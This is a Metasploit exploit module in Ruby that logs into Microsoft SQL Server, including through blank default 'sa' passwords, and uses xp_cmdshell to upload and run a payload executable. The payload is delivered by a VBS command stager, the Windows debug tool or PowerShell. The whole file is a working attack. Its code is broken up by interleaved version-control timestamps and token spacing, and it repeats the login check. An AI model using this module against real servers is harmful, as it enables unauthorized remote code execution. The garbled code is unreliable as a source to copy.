2009-10-14 21:11:28 +00:00
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf :: Exploit :: Remote
2009-12-06 05:50:37 +00:00
Rank = ExcellentRanking
2009-10-14 21:11:28 +00:00
include Msf :: Exploit :: Remote :: MSSQL
2010-05-26 22:39:56 +00:00
include Msf :: Exploit :: CmdStagerVBS
#include Msf::Exploit::CmdStagerDebugAsm
#include Msf::Exploit::CmdStagerDebugWrite
#include Msf::Exploit::CmdStagerTFTP
2009-10-14 21:11:28 +00:00
2010-03-05 00:29:44 +00:00
def initialize ( info = { } )
2009-10-14 21:11:28 +00:00
super ( update_info ( info ,
'Name' = > 'Microsoft SQL Server Payload Execution' ,
'Description' = > %q{
2010-10-17 17:39:43 +00:00
This module will utilize multiple methods in payload delivery on a given system all through MSSQL . JDuck 's method will utilize wscript in order to execute the initial stager. ReL1K' s method will utilize either Windows Debug which is currently installed on anything pre Windows 7 and utilize binary to hex conversion methods . ReL1K ' s newest method can utilize powershell for the conversion methods and can only be used on Server 2008 and Windows 7 based systems or with other systems that have installed powershell .
2009-10-14 21:11:28 +00:00
} ,
2010-03-05 00:29:44 +00:00
'Author' = > [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' , 'jduck' ] ,
2009-10-14 21:11:28 +00:00
'License' = > MSF_LICENSE ,
'Version' = > '$Revision$' ,
'References' = >
[
2010-10-19 15:52:33 +00:00
# 'sa' password in logs
2010-01-29 16:37:06 +00:00
[ 'CVE' , '2000-0402' ] ,
[ 'OSVDB' , '557' ] ,
[ 'BID' , '1281' ] ,
2010-10-19 15:52:33 +00:00
# blank default 'sa' password
2010-07-03 03:13:45 +00:00
[ 'CVE' , '2000-1209' ] ,
[ 'OSVDB' , '15757' ] ,
2010-10-17 17:39:43 +00:00
[ 'BID' , '4797' ]
2009-10-14 21:11:28 +00:00
] ,
'Platform' = > 'win' ,
'Targets' = >
[
[ 'Automatic' , { } ] ,
] ,
2010-07-03 03:13:45 +00:00
'DefaultTarget' = > 0 ,
'DisclosureDate' = > 'May 30 2000'
2010-10-17 17:39:43 +00:00
) )
2010-03-05 00:29:44 +00:00
register_options (
[
OptBool . new ( 'VERBOSE' , [ false , 'Enable verbose output' , false ] ) ,
OptBool . new ( 'UseCmdStager' , [ false , " Wait for user input before returning from exploit " , true ] ) ,
2010-10-17 17:39:43 +00:00
OptBool . new ( 'UseWinDebug' , [ false , " Use Windows debug for payload conversion, 2k3 and below only " , false ] ) ,
OptBool . new ( 'UsePowerShell' , [ false , " Use PowerShell for the payload conversion on Server 2008 and Windows 7 " , false ] ) ,
2010-03-05 00:29:44 +00:00
] )
2009-10-14 21:11:28 +00:00
end
2010-05-26 22:39:56 +00:00
# This is method required for the CmdStager to work...
def execute_command ( cmd , opts )
mssql_xpcmdshell ( cmd , datastore [ 'VERBOSE' ] )
end
2010-03-05 00:29:44 +00:00
2010-05-26 22:39:56 +00:00
def exploit
2010-03-05 00:29:44 +00:00
2010-05-26 22:39:56 +00:00
if ( not mssql_login_datastore )
2009-10-14 21:11:28 +00:00
print_status ( " Invalid SQL Server credentials " )
return
end
2010-03-05 00:29:44 +00:00
2010-10-17 17:39:43 +00:00
if ( not mssql_login_datastore )
print_status ( " Invalid SQL Server credentials " )
return
end
2010-12-21 20:20:20 +00:00
if ( datastore [ 'UseCmdStager' ] )
2010-05-26 22:39:56 +00:00
execute_cmdstager ( { :linemax = > 1500 , :nodelete = > true } )
#execute_cmdstager({ :linemax => 1500 })
2010-12-21 20:20:20 +00:00
else
# Generate the EXE, this is the same no matter what delivery mechanism we use
exe = generate_payload_exe
# Use powershell method for payload delivery if specified
if ( datastore [ 'UsePowerShell' ] )
powershell_upload_exec ( exe )
else
# Otherwise, fall back to the old way..
mssql_upload_exec ( exe , datastore [ 'VERBOSE' ] )
end
2010-03-05 00:29:44 +00:00
end
2009-10-14 21:11:28 +00:00
handler
disconnect
end
2010-03-05 00:29:44 +00:00
2009-10-14 21:11:28 +00:00
end
